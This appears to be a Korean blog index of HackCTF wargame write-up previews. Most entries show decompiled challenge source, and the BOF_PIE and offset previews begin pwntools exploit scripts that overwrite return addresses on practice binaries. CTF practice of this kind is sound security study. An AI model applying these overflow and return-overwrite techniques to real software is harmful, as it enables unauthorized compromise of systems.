War Games/hack-ctf
[hackctf] 1996
문제 소스 int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rax __int64 v5; // rdx __int64 v6; // rbx char *v7; // rax __int64 v8; // rdx __int64 v9; // rax char name; // [rsp+0h] [rbp-410h] std::operator(&std::cin, &name); v4 = std::operator
War Games/hack-ctf
[hackctf] Poet
문제 소스 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0LL, 2, 0LL); puts(s); while ( 1 ) { get_poem(); get_author(); rate_poem(); if ( dword_6024E0 == 0xF4240 ) break; puts(asc_400D78); } reward(); } __int64 get_author() { printf(&byte_400C38); return gets((__int64)&unk_6024A0); } void __noreturn reward() { char s; // [rsp+0h] [rbp-90h] FILE *str..
War Games/hack-ctf
[hackctf] RTL_World
문제 소스 int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax int v4; // [esp+0h] [ebp-A0h] int v5; // [esp+10h] [ebp-90h] char buf; // [esp+14h] [ebp-8Ch] void *v7; // [esp+94h] [ebp-Ch] void *handle; // [esp+98h] [ebp-8h] void *s1; // [esp+9Ch] [ebp-4h] setvbuf(stdout, 0, 2, 0); handle = dlopen("/lib/i386-linux-gnu/libc.so.6", 1); v7 = dlsym(handle, "system"); dlc..
War Games/hack-ctf
[hackctf] Yes or no
문제 소스 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax int v4; // eax int v5; // ecx int v6; // eax int v7; // eax char s; // [rsp+Eh] [rbp-12h] int v10; // [rsp+18h] [rbp-8h] int v11; // [rsp+1Ch] [rbp-4h] setvbuf(stdout, 0LL, 2, 0LL); v11 = 5; puts("Show me your number~!"); fgets(&s, 10, stdin); v10 = atoi(&s); if ( (v11 - 10) >> 3 < 0 ) { v4 = 0; } else { v3 =..
War Games/hack-ctf
[hackctf] BOF_PIE
문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : Partial 문제 분석 및 페이로드 welcome함수가 맵핑되는 주소가 leak되니 welcome함수로부터 "종현"함수까지의 거리를 알아내고 ret을 변조시키면 된다. from pwn import * dns,port="ctf.j0n9hyun.xyz", 3008 p=remote(dns,port) # #p=process("./bof_pie") e=ELF("./bof_pie") p.recvuntil("is ") addr=p.recvline()[:-1] print addr pay="A"*22 pay+=p32(int(addr,16)..
War Games/hack-ctf
[hackctf] offset
문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : FULL 문제 분석 및 페이로드 1. gets함수가 있으나 pie보호 기법이 걸려 ret over write를 해도 print_flag함수 호출 불가능 2. two함수와 print_flag주소가 인접함을 눈치챔 3. select_func함수에서 결론적으로 v3()를 호출하는데 dest변수에 strncpy를 해주기 때문에 v3변수의 하위 1바이트 변조가능 from pwn import * context.log_level='debug' #p=process('./offset') dns,port="ctf.j0n9hyun.xyz",30..
